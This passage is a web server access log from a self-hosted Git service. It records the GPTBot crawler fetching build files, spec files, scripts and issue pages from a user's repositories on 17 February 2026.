"/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110385] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110384] [Gzip 18.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11022] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11021] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 110354] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" +[17/Feb/2026:17:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14739] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:17:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.spec" +[17/Feb/2026:17:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/calculator.py" +[17/Feb/2026:17:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png?display=rendered" [Client 74.7.227.38] [Length 11011] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldBar.png" +[17/Feb/2026:17:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/main.cpp" +[17/Feb/2026:17:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&state=open&type=all" +[17/Feb/2026:17:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&state=closed&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" +[17/Feb/2026:17:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9972] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls" +[17/Feb/2026:17:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final.spec" +[17/Feb/2026:17:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py?display=source" [Client 74.7.227.38] [Length 17127] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:17:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12611] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17436] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:17:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libssl-3-x64.dll" +[17/Feb/2026:17:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10918] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12612] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:17:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.2.spec" +[17/Feb/2026:17:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v5.1.spec" +[17/Feb/2026:17:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v4.7.spec" +[17/Feb/2026:17:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=source" [Client 74.7.227.38] [Length 12640] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:17:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:17:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec?display=rendered" [Client 74.7.227.38] [Length 10921] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_V5.3.spec" +[17/Feb/2026:17:33:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:17:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.8.spec" +[17/Feb/2026:17:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:17:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10909] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v3.5_Final.spec" +[17/Feb/2026:17:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:17:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.8.spec" +[17/Feb/2026:17:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_v4.9.spec" +[17/Feb/2026:17:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec?display=source" [Client 74.7.227.38] [Length 12641] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_v3.6_Final.spec" +[17/Feb/2026:17:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17437] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; 